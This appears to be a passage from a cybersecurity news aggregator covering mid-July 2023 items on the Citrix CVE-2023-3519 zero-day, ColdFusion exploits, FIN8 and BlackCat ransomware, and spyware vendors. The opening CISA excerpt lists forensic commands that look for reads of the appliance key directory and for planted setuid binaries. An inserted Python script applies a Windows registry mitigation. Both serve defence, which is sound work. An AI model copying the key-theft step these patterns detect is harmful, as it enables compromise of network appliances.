"\.php" /var/log/httperror.log* . Check shell logs for unusual post-ex commands, for example: grep "/flash/nsconfig/keys" /var/log/sh.log* . Look for setuid binaries dropped: find /var [...] ls -l {} \; . The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of information technology (IT) and operational technology (OT) security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. REFERENCES [1] Citrix Security Bulletin CTX561482: Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467


                Paris 2024 Olympics: Concern over French plan for AI surveillance

                industry
                2023-07-19 https://www.bbc.co.uk/news/world-europe-66122743?at_medium=RSS&at_campaign=KARANGA
                CCTV will use algorithms to detect fights and abandoned bags - but not everyone is happy about it.



                Trends in ransomware-as-a-service and cryptocurrency to monitor

                exploits ransomware
                2023-07-19 https://www.helpnetsecurity.com/2023/07/19/cryptocurrency-ransomware-payments/

                In January, law enforcement officials disrupted the operations of the Hive cybercriminal group, which profited off a ransomware-as-a-service (RaaS) business model. Hive is widely believed to be affiliated with the Conti ransomware group, joining a list of other groups associated with former Conti operators, including Royal, Black Basta, and Quantum. RaaS affiliates are all over the globe, and so are their victims. These affiliates use a myriad of different tactics and techniques. In this article, … More

                The post Trends in ransomware-as-a-service and cryptocurrency to monitor appeared first on Help Net Security.


                Autosummary: Hive’s modus operandi: Hive, like other RaaS providers, wrote a ransomware encryptor, created a dark web domain, advertised their services to affiliates and forums, and then allowed users to purchase a license (for their services) to configure a ransomware payload and receive extortion funds. You would need to implement a policy to ensure MFA is on any authentication to your network (a zero-trust network, ideally), multi-factor license(s) if you don’t have them, email security and phishing training solutions, and a patch management system with comprehensive asset management behind it. For example, Hive affiliates have been known to breach organizations using Remote Desktop Protocol (RDP) without multi-factor authentication (MFA), stolen credentials, phishing campaigns, and software vulnerabilities.


                What to do (and what not to do) after a data breach

                financial
                2023-07-19 https://www.helpnetsecurity.com/2023/07/19/what-to-do-and-not-do-after-data-breach-video/

                Data breaches have been hitting the headlines left and right. Every time a breach occurs, the impacted organization’s response differs from the last. In this Help Net Security video, Rodman Ramezanian, Global Cloud Threat Lead at Skyhigh Security, discusses what we should do – and not do – in the wake of a data breach.

                The post What to do (and what not to do) after a data breach appeared first on Help Net Security.




                U.S. Government Blacklists Cytrox and Intellexa Spyware Vendors for Cyber Espionage

                government
                2023-07-19 https://thehackernews.com/2023/07/us-government-blacklists-cytrox-and.html
                The U.S. government on Tuesday added two foreign commercial spyware vendors, Cytrox and Intellexa, to an economic blocklist for weaponizing cyber exploits to gain unauthorized access to devices and "threatening the privacy and security of individuals and organizations worldwide." This includes the companies' corporate holdings in Hungary (Cytrox Holdings Crt), North Macedonia (Cytrox AD), Greece

                Autosummary: The move builds on U.S. actions in November 2021, when the U.S. government added Israeli companies NSO Group and Candiru to the Entity List for developing software to target government officials, journalists, businesspeople, activists, academics, and embassy workers.


                Zero-Day Attacks Exploited Critical Vulnerability in Citrix ADC and Gateway

                exploits
                2023-07-19 https://thehackernews.com/2023/07/zero-day-attacks-exploited-critical.html
                Citrix is alerting users of a critical security flaw in NetScaler Application Delivery Controller (ADC) and Gateway that it said is being actively exploited in the wild. Tracked as CVE-2023-3519 (CVSS score: 9.8), the issue relates to a case of code injection that could result in unauthenticated remote code execution. It impacts the following versions - NetScaler ADC and NetScaler Gateway 13.1



                FBI: Tech support scams now use shipping companies to collect cash

                financial
                2023-07-19 https://www.bleepingcomputer.com/news/security/fbi-tech-support-scams-now-use-shipping-companies-to-collect-cash/
                The FBI is warning of a surge in tech support scams targeting the elderly across the United States and urging victims to dispatch cash concealed within magazines or similar items through shipping firms. [...]

                Autosummary: "The FBI is warning the public of a recent nationwide uptick in technical support scams targeting older adults, where scammers instruct victims to send cash, wrapped in a magazine(s), via shipping companies," the FBI cautioned in a public service announcement issued through the Internet Crime Complaint Center (IC3).


                Cybersecurity measures SMBs should implement

                ciber
                2023-07-19 https://www.helpnetsecurity.com/2023/07/19/smbs-cybersecurity-controls/

                Small and medium-sized businesses (SMBs) are targeted by cyberattackers as much as large companies, the 2023 Verizon Data Breach Investigations Report (DBIR) has revealed; here are some cybersecurity controls they should prioritize. Company size does not matter to cyber attackers: SMBs often underestimate their appeal as a potential target. They assume they are “little fish” not worth the attackers’ effort and that their data holds little value. But that’s not true: their systems store sensitive … More

                The post Cybersecurity measures SMBs should implement appeared first on Help Net Security.

                "

                Autosummary: Once essential cyber hygiene is achieved with those and after a company begins moving closer to the larger end of the SMB scale and has more resources available, it’s time to add other security controls:
                Incident response management – Establish and sustain an incident response program for prompt attack response
                Application software security – Identify and address vulnerabilities in internally developed, hosted, or acquired software to prevent potential harm to the company
                Penetration testing – Test the efficacy and resilience of enterprise assets and implemented controls by simulating attackers’ actions
                “Now that you’ve already looked at the Controls and prioritized them, you know what you’re most likely to be hit with and you’re working your way through to the end—your ducks are almost all in a row. "


                U.S. Cyber Trust Mark labeling program raises the bar for smart devices’ cybersecurity

                ciber
                2023-07-19 https://www.helpnetsecurity.com/2023/07/19/u-s-cyber-trust-mark/

                The Biden-Harris Administration has announced a cybersecurity certification and labeling program to help Americans more easily choose smart devices that are safer and less vulnerable to cyberattacks. The new “U.S. Cyber Trust Mark” program proposed by FCC Chairwoman Jessica Rosenworcel would raise the bar for cybersecurity across common devices, including smart refrigerators, smart microwaves, smart televisions, smart climate control systems, smart fitness trackers, and more. Several major electronics, appliance, and consumer product manufacturers, retailers, and … More

                The post U.S. Cyber Trust Mark labeling program raises the bar for smart devices’ cybersecurity appeared first on Help Net Security.

                "

                Autosummary: Participants in this announcement include: Amazon, Best Buy, Carnegie Mellon University, CyLab, Cisco Systems, Connectivity Standards Alliance, Consumer Reports, Consumer Technology Association, Google, Infineon, the Information Technology Industry Council, IoXT, KeySight, LG Electronics U.S.A., Logitech, OpenPolicy, Qorvo, Qualcomm, Samsung Electronics, UL Solutions, Yale and August U.S. "


                Citrix NetScaler zero-day exploited in the wild, patch is available (CVE-2023-3519)

                exploits
                2023-07-19 https://www.helpnetsecurity.com/2023/07/19/cve-2023-3519/

                Citrix has patched three vulnerabilities (CVE-2023-3519, CVE-2023-3466, CVE-2023-3467) in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway), one of which is a zero-day being exploited by attackers. A zero-day patched (CVE-2023-3519) CVE-2023-3519 is a remote code execution (RCE) vulnerability that could allow an unauthenticated threat actor to execute arbitrary code on a vulnerable server. At this time there is no public PoC, but the vulnerability has been observed being exploited in the … More

                The post Citrix NetScaler zero-day exploited in the wild, patch is available (CVE-2023-3519) appeared first on Help Net Security.

                "

                Autosummary: The company noted that the following supported versions of NetScaler ADC and NetScaler Gateway are affected by the three patched vulnerabilities: NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 NetScaler ADC 13.1-FIPS before 13.1-37.159 NetScaler ADC 12.1-FIPS before 12.1-55.297 NetScaler ADC 12.1-NDcPP before 12.1-55.297 Fixes have been provided for all these versions including the later releases. "


                Citrix warns of actively exploited zero-day in ADC and Gateway

                exploits
                2023-07-19 https://securityaffairs.com/148594/security/citrix-netscaler-application-delivery-controller-flaw.html

                Citrix is warning customers of an actively exploited critical vulnerability, tracked as CVE-2023-3519 (CVSS score: 9.8), in NetScaler Application Delivery Controller (ADC) and Gateway. The vulnerability is […]

                The post Citrix warns of actively exploited zero-day in ADC and Gateway appeared first on Security Affairs.

                "

                Autosummary: "


                Women's World Cup 2023: Brazilian civil servants can start work late

                latam
                2023-07-19 https://www.bbc.co.uk/sport/football/66241967?at_medium=RSS&at_campaign=KARANGA
                Civil servants in Brazil have been told they can report to work up to four hours later than usual on days when their national side plays at the 2023 Women's World Cup. "

                Autosummary: "


                US Gov adds surveillance firms Cytrox and Intellexa to Entity List for trafficking in cyber exploits

                exploits
                2023-07-19 https://securityaffairs.com/148603/laws-and-regulations/us-gov-cytrox-intellexa-entity-list.html

                The U.S. Commerce Department’s Bureau of Industry and Security (BIS) added surveillance technology vendors Cytrox and Intellexa to the Entity List, an economic blocklist, for trafficking in cyber exploits used to gain access to information systems. The Entity List maintained […]

                The post US Gov adds surveillance firms Cytrox and Intellexa to Entity List for trafficking in cyber exploits appeared first on Security Affairs.

                "

                Autosummary: According to Google, the exploits were included in Cytrox’s commercial surveillance spyware that is sold to different nation-state actors, including Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia. "


                Colombia landslide: Rescuers search for survivors amid mud

                latam
                2023-07-19 https://www.bbc.co.uk/news/world-latin-america-66245320?at_medium=RSS&at_campaign=KARANGA
                Fifteen people are dead after rivers burst their banks and caused a landslide south-east of Bogotá. "

                Autosummary: "


                Feedzai Railgun protects customers against financial crime

                financial
                2023-07-19 https://www.helpnetsecurity.com/2023/07/19/feedzai-railgun/

                Feedzai introduced Railgun, its next-generation AI engine designed to target and intercept financial fraud before it can occur. In order to scale, today’s risk engines force financial institutions to limit the data they use to make risk decisions – typically by looking only at a limited history of data, and by using only a subset of relevant data inputs. Railgun removes these constraints, so financial institutions can now use a complete history of all relevant … More

                The post Feedzai Railgun protects customers against financial crime appeared first on Help Net Security.

                "

                Autosummary: Feedzai invests heavily in basic research, and in the last three years has created nearly 100 patents and pending patents in the US and Europe, covering innovations in a wide variety of areas including applied AI and machine learning, fraud detection, streaming data processing and analytics, money laundering detection, rules management, and AI explainability and fairness. "


                ExtraHop IDS for Government identifies malicious activity within encrypted traffic

                government
                2023-07-19 https://www.helpnetsecurity.com/2023/07/19/extrahop-ids-for-government/

                ExtraHop launched ExtraHop IDS for Government to help agencies accelerate zero trust ahead of the 2024 deadline. As agencies look to implement a zero trust architecture ahead of the 2024 deadline, they are racing to enhance visibility into their IT environments so they can verify that all users, devices, and systems are in alignment with the framework. However, the growing move to decentralize IT infrastructure has added new challenges for already resource-strapped government organizations, increasing … More

                The post ExtraHop IDS for Government identifies malicious activity within encrypted traffic appeared first on Help Net Security.

                "

                Autosummary: “After two decades in the federal sector as a user, cybersecurity executive, and technology project manager, I can personally attest to the rapidly growing need for cybersecurity solutions that government organizations can trust to detect and reveal attacks in real-time,” said Mark Bowling, Chief Information Security and Risk Officer (CISRO), ExtraHop. "


                Adobe emergency patch fixes new ColdFusion zero-day used in attacks

                exploits
                2023-07-19 https://www.bleepingcomputer.com/news/security/adobe-emergency-patch-fixes-new-coldfusion-zero-day-used-in-attacks/
                Adobe released an emergency ColdFusion security update that fixes critical vulnerabilities, including a fix for a new zero-day exploited in attacks. [...] "

                Autosummary: "


                Microsoft: Hackers turn Exchange servers into malware control centers

                exploits
                2023-07-19 https://www.bleepingcomputer.com/news/security/microsoft-hackers-turn-exchange-servers-into-malware-control-centers/
                Microsoft and the Ukraine CERT warn of new attacks by the Russian state-sponsored Turla hacking group, targeting the defense industry and Microsoft Exchange servers with a new "DeliveryCheck" malware backdoor. [...] "

                Autosummary: This malware is a cyberespionage tool that allows the threat actors to launch JavaScript on the device, steal data from event logs, steal information about system files, and steal authentication tokens, cookies, and credentials from a wide variety of programs, including browsers, FTP clients, VPN software, KeePass, Azure, AWS, and Outlook. "


                Estée Lauder beauty giant breached by two ransomware gangs

                exploits ransomware
                2023-07-19 https://www.bleepingcomputer.com/news/security/est-e-lauder-beauty-giant-breached-by-two-ransomware-gangs/
                Two ransomware actors, ALPHV/BlackCat and Clop, have listed beauty company Estée Lauder on their data leak sites as a victim of separate attacks. [...] "

                Autosummary: In the SEC filing, the company informs that the focus is “on remediation, including efforts to restore impacted systems and services” and that the “incident has caused, and is expected to continue to cause, disruption to parts of the Company’s business operations.” "


                Plane sailing for ticket scammers: How to keep your flight plans safe

                financial
                2023-07-19 https://www.malwarebytes.com/blog/news/2023/07/plane-sailing-for-ticket-scammers-how-to-keep-your-flight-plans-safe

                Categories: Personal

                Tags: plane, ticket, holiday, flight, airplane, aeroplane, scam, phish, phishing, social engineering

                We take a look at several scams targeting flyers off on their holidays, and how you can keep yourself safe.

                The post Plane sailing for ticket scammers: How to keep your flight plans safe appeared first on Malwarebytes Labs.

                "

                Autosummary: The rest are a combination of “temporarily restricted” accounts, accounts set to private (and so not visible to non-followers), private individuals, video game themed(!), and more. If you’re revealing your name, frequent flyer number, and passport information online then you’re a possible meal ticket for scammers. "


                Microsoft validation error allowed state actor to access user email of government agencies and others

                government
                2023-07-19 https://www.malwarebytes.com/blog/news/2023/07/microsoft-validation-error-allowed-state-actor-to-access-user-email-of-government-agencies-and-others

                Categories: News

                Tags: Microsoft, MSA, OWA, validation token, signing key, Storm-0558, GetAccessTokensForResource

                Due to a validation error in Microsoft code, a suspected Chinese attacker was able to access user email from approximately 25 organizations, including government agencies.

                The post Microsoft validation error allowed state actor to access user email of government agencies and others appeared first on Malwarebytes Labs.

                "

                Autosummary: An authentication token allows internet users to access applications, services, websites, and application programming interfaces (APIs) without having to enter their login credentials each time they visit. "


                Adobe fixes patch bypass for exploited ColdFusion CVE-2023-29298 flaw

                exploits
                2023-07-19 https://www.bleepingcomputer.com/news/security/adobe-fixes-patch-bypass-for-exploited-coldfusion-cve-2023-29298-flaw/
                Adobe released an emergency ColdFusion security update that fixes critical vulnerabilities, including a fix for a new zero-day exploited in attacks. [...] "

                Autosummary: "


                Healthcare organizations in the crosshairs of cyberattackers

                ciber
                2023-07-18 https://www.helpnetsecurity.com/2023/07/18/healthcare-organizations-cyber-threats/

                In an era where cyber threats continue to evolve, healthcare organizations are increasingly targeted by malicious actors employing multiple attack vectors, according to Trustwave. In its new research, Trustwave SpiderLabs has documented the attack flow utilized by threat groups, shedding light on their tactics, techniques, and procedures. From phishing emails to exploiting known vulnerabilities and compromising third-party vendors, these persistent threats pose significant risks to the healthcare industry. Healthcare industry bears heavier financial burden While … More

                The post Healthcare organizations in the crosshairs of cyberattackers appeared first on Help Net Security.

                "

                Autosummary: Threat actors: LockBit 3.0, ALPHV/BlackCat, Clop, DMA Locker, Royal, Babuk, Magniber, Black Basta, RansomHouse. “Protecting the supply chain and maintaining business continuity are critical considerations across most industries, but healthcare cyber leaders encounter distinct challenges in safeguarding patient well-being, maintaining quality of care, and enabling healthcare professionals to leverage cutting-edge digital technologies to perform at the highest level,” said Trustwave CISO Kory Daniels. "


                JumpCloud Blames "Sophisticated Nation-State" Actor for Security Breach

                government
                2023-07-18 https://thehackernews.com/2023/07/jumpcloud-blames-sophisticated-nation.html
                A little over a week after JumpCloud reset API keys of customers impacted by a security incident, the company said the intrusion was the work of a sophisticated nation-state actor. The adversary "gained unauthorized access to our systems to target a small and specific set of our customers," Bob Phan, chief information security officer (CISO) at JumpCloud, said in a post-mortem report. "The "

                Autosummary: The adversary "gained unauthorized access to our systems to target a small and specific set of our customers," Bob Phan, chief information security officer (CISO) at JumpCloud, said in a post-mortem report. "


                CISA orders govt agencies to mitigate Windows and Office zero-days

                exploits
                2023-07-18 https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-mitigate-windows-and-office-zero-days/
                CISA ordered federal agencies to mitigate remote code execution zero-days affecting Windows and Office products that were exploited by the Russian-based RomCom cybercriminal group in NATO phishing attacks. [...] "

                Autosummary: Those not using these protections can add the following process names to the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key as values of type REG_DWORD with data 1 to remove the attack vector: Excel.exe, Graph.exe, MSAccess.exe, MSPub.exe, PowerPoint.exe, Visio.exe, WinProj.exe, WinWord.exe, Wordpad.exe. "
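                The registry mitigation above is a list of value names under one key, which is easy to get subtly wrong across a fleet (wrong type, a missing name, a typo in the key). As an added example, not code from the article or from Microsoft, the following Python renders that mitigation as a .reg file for `reg import` or Group Policy deployment and, on a Windows host, applies it and verifies that every listed process name is present as REG_DWORD 1. The process names are those the article lists; the full key path under HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl is an assumption recalled from Microsoft's advisory, so confirm it against the advisory before deploying.

```python
"""Added example: render, apply and verify the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION
mitigation described above. Not Microsoft's or BleepingComputer's code. The value names
are from the article; KEY_PATH is an assumption to be checked against Microsoft's advisory."""
from __future__ import annotations

import sys

# Assumed key path (HKLM-relative), per memory of Microsoft's advisory: verify before use.
KEY_PATH = (r"SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl"
            r"\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION")

# Process names listed in the article; each becomes a REG_DWORD value with data 1.
PROCESSES = ("Excel.exe", "Graph.exe", "MSAccess.exe", "MSPub.exe", "PowerPoint.exe",
             "Visio.exe", "WinProj.exe", "WinWord.exe", "Wordpad.exe")


def render_reg_file() -> str:
    """Return .reg file text (CRLF, Regedit 5.00 header) that sets every value to dword 1."""
    lines = ["Windows Registry Editor Version 5.00", "", f"[HKEY_LOCAL_MACHINE\\{KEY_PATH}]"]
    lines += [f'"{name}"=dword:00000001' for name in PROCESSES]
    return "\r\n".join(lines) + "\r\n"


def apply_mitigation() -> None:
    """Create the key if needed and write all values (Windows only; run elevated)."""
    import winreg  # stdlib on Windows only
    with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, KEY_PATH, 0, winreg.KEY_SET_VALUE) as key:
        for name in PROCESSES:
            winreg.SetValueEx(key, name, 0, winreg.REG_DWORD, 1)


def missing_entries() -> list[str]:
    """Return the process names that are absent, not REG_DWORD, or not set to 1 (Windows only)."""
    import winreg
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH, 0, winreg.KEY_READ)
    except FileNotFoundError:
        return list(PROCESSES)          # key itself is missing: nothing is mitigated
    missing: list[str] = []
    with key:
        for name in PROCESSES:
            try:
                data, kind = winreg.QueryValueEx(key, name)
            except FileNotFoundError:
                missing.append(name)
                continue
            if kind != winreg.REG_DWORD or data != 1:
                missing.append(name)
    return missing


if __name__ == "__main__":
    if sys.platform == "win32":
        apply_mitigation()
        gaps = missing_entries()
        print("mitigation verified" if not gaps else f"still missing: {', '.join(gaps)}")
    else:
        # Off Windows, just emit the .reg file for deployment through other tooling.
        sys.stdout.write(render_reg_file())
```

                `missing_entries()` returning an empty list is the check to drop into a compliance script. The article's qualifier still applies: hosts already covered by the protections Microsoft named (Defender for Office, or the attack surface reduction rule that blocks Office applications from creating child processes) do not need the registry change, and Microsoft cautioned that the registry mitigation can affect some functionality of the listed applications, so test it before pushing it fleet-wide.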


                FIN8 Group Using Modified Sardonic Backdoor for BlackCat Ransomware Attacks

                exploits ransomware
                2023-07-18 https://thehackernews.com/2023/07/fin8-group-using-modified-sardonic.html
                The financially motivated threat actor known as FIN8 has been observed using a "revamped" version of a backdoor called Sardonic to deliver the BlackCat ransomware. According to the Symantec Threat Hunter Team, part of Broadcom, the development is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. The intrusion attempt took place in "

                Autosummary: "The C++-based Sardonic backdoor has the ability to harvest system information and execute commands, and has a plugin system designed to load and execute additional malware payloads delivered as DLLs," Symantec said in a report shared with The Hacker News. "


                Cybercriminals Exploiting WooCommerce Payments Plugin Flaw to Hijack Websites

                exploits ciber
                2023-07-18 https://thehackernews.com/2023/07/cybercriminals-exploiting-woocommerce.html
                Threat actors are actively exploiting a recently disclosed critical security flaw in the WooCommerce Payments WordPress plugin as part of a massive targeted campaign. The flaw, tracked as CVE-2023-28121 (CVSS score: 9.8), is a case of authentication bypass that enables unauthenticated attackers to impersonate arbitrary users and perform some actions as the impersonated user, including an "

                Autosummary: "Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023," Wordfence security researcher Ram Gall said in a Monday post. "


                JumpCloud revealed it was hit by a sophisticated attack by a nation-state actor

                government
                2023-07-18 https://securityaffairs.com/148547/apt/jumpcloud-nation-state-actor-attack.html

                Software firm JumpCloud announced it was the victim of a sophisticated cyber attack carried out by a nation-state actor. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless and secure manner. It allows IT administrators to centralize and simplify their identity and access management tasks across […]

                The post JumpCloud revealed it was hit by a sophisticated attack by a nation-state actor appeared first on Security Affairs.

                "

                Autosummary: "


                FIN8 deploys ALPHV ransomware using Sardonic malware variant

                exploits ransomware
                2023-07-18 https://www.bleepingcomputer.com/news/security/fin8-deploys-alphv-ransomware-using-sardonic-malware-variant/
                A financially motivated cybercrime gang has been observed deploying BlackCat ransomware payloads on networks backdoored using a revamped Sardonic malware version. [...] "

                Autosummary: Tracked as FIN8 (aka Syssphinx), this threat actor has been actively operating since at least January 2016, focusing on targeting industries such as retail, restaurants, hospitality, healthcare, and entertainment. "


                Google Cloud Build bug lets hackers launch supply chain attacks

                exploits
                2023-07-18 https://www.bleepingcomputer.com/news/security/google-cloud-build-bug-lets-hackers-launch-supply-chain-attacks/
                A critical design flaw in the Google Cloud Build service discovered by cloud security firm Orca Security can let attackers escalate privileges, providing them with nearly full, unauthorized access to Google Artifact Registry code repositories. [...] "

                Autosummary: After Orca Security reported the issue, the Google Security Team implemented a partial fix, revoking the logging.privateLogEntries.list permission from the default Cloud Build Service Account, a permission unrelated to Artifact Registry. "


                Adobe ColdFusion vulnerabilities exploited to deliver web shells (CVE-2023-29298, CVE-2023-38203)

                exploits
                2023-07-18 https://www.helpnetsecurity.com/2023/07/18/cve-2023-29298-cve-2023-38203/

                Attackers are exploiting two Adobe ColdFusion vulnerabilities (CVE-2023-29298, CVE-2023-38203) to breach servers and install web shells to enable persistent access and allow remote control of the system, according to Rapid7 researchers. Flaws with incomplete fixes On July 11, 2023, Adobe released security updates for ColdFusion versions 2023, 2021 and 2018 containing fixes for three vulnerabilities: CVE-2023-29298, a critical improper access control flaw that could allow attackers to bypass a security feature (reported by Rapid7’s Stephen … More

                The post Adobe ColdFusion vulnerabilities exploited to deliver web shells (CVE-2023-29298, CVE-2023-38203) appeared first on Help Net Security.

                "

                Autosummary: Flaws with incomplete fixes: On July 11, 2023, Adobe released security updates for ColdFusion versions 2023, 2021 and 2018 containing fixes for three vulnerabilities:
                CVE-2023-29298, a critical improper access control flaw that could allow attackers to bypass a security feature (reported by Rapid7’s Stephen Fewer);
                CVE-2023-29300, a deserialization of untrusted data flaw that could be exploited for arbitrary code execution (reported by CrowdStrike’s Nicolas Zilio);
                CVE-2023-29301, another security feature bypass vulnerability (reported by Brian Reilly).
                At the time, there was no indication that any of them were being exploited in the wild. "


                Seed Group and Resecurity collaborate to reshape Middle East’s cybersecurity landscape

                ciber
                2023-07-18 https://www.helpnetsecurity.com/2023/07/18/seed-group-resecurity/

                Aiming to protect the digital ecosystem in the UAE and the Mena region, Seed Group, has announced a strategic partnership with Resecurity. With this strategic partnership, Seed Group and Resecurity are set to reshape the cybersecurity landscape in the Middle East, empowering organisations with advanced tools and techniques to proactively combat emerging threats in an increasingly digital world. The collaboration between Seed Group and Resecurity aims to equip regional businesses with the latest cybersecurity solutions, … More

                The post Seed Group and Resecurity collaborate to reshape Middle East’s cybersecurity landscape appeared first on Help Net Security.

                "

                Autosummary: "


                Egress defends users against phishing threats with adaptive security capability

                financial
                2023-07-18 https://www.helpnetsecurity.com/2023/07/18/egress-intelligent-email-security/

                Egress launched adaptive security for its Intelligent Email Security platform, providing dynamic and automated protection against advanced inbound and outbound threats, transforming the way in which organizations manage human risk on email. Egress CEO Tony Pepper comments: “Almost every organization freely admits that people represent the biggest risk to their security and are most vulnerable when using email. By implementing an adaptive security architecture, we can continually assess human risk on a per user basis … More

                The post Egress defends users against phishing threats with adaptive security capability appeared first on Help Net Security.

                "

                Autosummary: The benefits of this approach include: Inbound and outbound email security: As adaptive security takes a proactive approach to managing human risk, Egress’ innovation will empower organizations to automatically adjust their email security controls in the areas that need it most. "


                Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware

                exploits
                2023-07-18 https://thehackernews.com/2023/07/pakistani-entities-targeted-in.html
                An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad, a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews. Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and "

                Autosummary: Telerik.Windows.Data.Validation.dll is a valid applaunch.exe file signed by Microsoft, which is vulnerable to DLL side-loading and is used to sideload mscoree.dll that, in turn, loads mscoree.dll.dat, the ShadowPad payload. "


                Go Beyond the Headlines for Deeper Dives into the Cybercriminal Underground

                ciber
                2023-07-18 https://thehackernews.com/2023/07/go-beyond-headlines-for-deeper-dives.html
                Discover stories about threat actors’ latest tactics, techniques, and procedures from Cybersixgill’s threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT "

                Autosummary: What should companies do to protect employees and critical assets from the unintended risks posed by ChatGPT? Pro-Russian hacktivists attack Microsoft platforms, threaten European banking system: A highly active pro-Russian hacktivist group knocked offline multiple Microsoft platforms, demanding US$1M to halt the attacks, echoing the collective's strategy in a recent Distributed-Denial-of-Service (DDoS) incident targeting Scandinavian Airlines. Ultimately, threat actors could leverage CVE-2023-20887 to access networks and inject malicious commands into Aria Operations for Networks, which could lead to data theft, data corruption, or even complete system compromise. "


                Colombian mudslide: Children swept away as river burst its banks

                financial latam
                2023-07-18 https://www.bbc.co.uk/news/world-latin-america-66232220?at_medium=RSS&at_campaign=KARANGA
                At least 10 people are dead after rising river waters swept away homes in Cundinamarca province. "

                Autosummary: "


                New critical Citrix ADC and Gateway flaw exploited as zero-days

                exploits
                2023-07-18 https://www.bleepingcomputer.com/news/security/new-critical-citrix-adc-and-gateway-flaw-exploited-as-zero-days/
                Citrix today is alerting customers of a critical-severity vulnerability (CVE-2023-3519) in NetScaler ADC and NetScaler Gateway that already has exploits in the wild, and "strongly urges" them to install updated versions without delay. [...] "

                Autosummary: In a security bulletin today, Citrix says that “exploits of CVE-2023-3519 on unmitigated appliances have been observed” and strongly advises its customers to switch to an updated version that fixes the issue: NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0 NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP The company notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached the end-of-life stage and customers should upgrade to a newer variant of the product. "


                Spectro Cloud brings Kubernetes management to government organizations with Palette VerteX

                government
                2023-07-18 https://www.helpnetsecurity.com/2023/07/18/spectro-cloud-palette-vertex-government-practice/

                Spectro Cloud announces new Palette VerteX Edition and new Spectro Cloud Government practice to meet the growing need for powerful management and security for Kubernetes (K8s) in the public sector. Kubernetes adoption is growing across the public sector, from federal and defense to state and local government. Public sector organizations are looking to K8s and the open-source, cloud-native ecosystem around it to help drive IT agility in pursuit of their mission. But IT and platform … More

                The post Spectro Cloud brings Kubernetes management to government organizations with Palette VerteX appeared first on Help Net Security.

                "

                Autosummary: “Palette VerteX is designed from the ground up with security in mind that permeates every aspect it touches, giving government IT, platform engineering, and security teams the confidence they need to deploy and manage any Kubernetes environment at scale,” said Matthew Appler, CEO, Corsec Security. Government organizations can leverage their existing investments while charting a course for modern Kubernetes, with openness as a core design principle in Palette VerteX. “The Palette VerteX announcement comes at a pivotal time in the public sector where managing Kubernetes across organizations using multiple cluster types, across multiple cloud and on-prem environments is very much a challenging reality,” said Josh Slattery, VP of Technology Sales at Vertosoft. "


                Ricardo Martinelli: Panama's ex-leader guilty of money laundering

                financial latam
                2023-07-18 https://www.bbc.co.uk/news/world-latin-america-66236404?at_medium=RSS&at_campaign=KARANGA
                Ricardo Martinelli has been found guilty of siphoning off millions of dollars from state contracts. "

                Autosummary: "


                Cybersecurity firm Sophos impersonated by new SophosEncrypt ransomware

                exploits ransomware ciber
                2023-07-18 https://www.bleepingcomputer.com/news/security/cybersecurity-firm-sophos-impersonated-by-new-sophosencrypt-ransomware/
                Cybersecurity vendor Sophos is being impersonated by a new ransomware-as-a-service called SophosEncrypt, with the threat actors using the company name for their operation. [...] "

                Autosummary: In each folder where a file is encrypted, the ransomware will create a ransom note named information.hta, which is automatically launched when the encryption is finished. "


                New critical Citrix ADC and Gateway flaw exploited as zero-day

                exploits
                2023-07-18 https://www.bleepingcomputer.com/news/security/new-critical-citrix-adc-and-gateway-flaw-exploited-as-zero-day/
                Citrix today is alerting customers of a critical-severity vulnerability (CVE-2023-3519) in NetScaler ADC and NetScaler Gateway that already has exploits in the wild, and "strongly urges" customers to install updated versions without delay. [...] "

                Autosummary: In a security bulletin today, Citrix says that “exploits of CVE-2023-3519 on unmitigated appliances have been observed” and strongly advises its customers to switch to an updated version that fixes the issue: NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases; NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0; NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS; NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS; NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP. The company notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached end-of-life and customers should upgrade to a newer version of the product. "


                FIN8 Group spotted delivering the BlackCat Ransomware

                exploits ransomware
                2023-07-18 https://securityaffairs.com/148569/cyber-crime/fin8-group-spotted-delivering-the-blackcat-ransomware.html

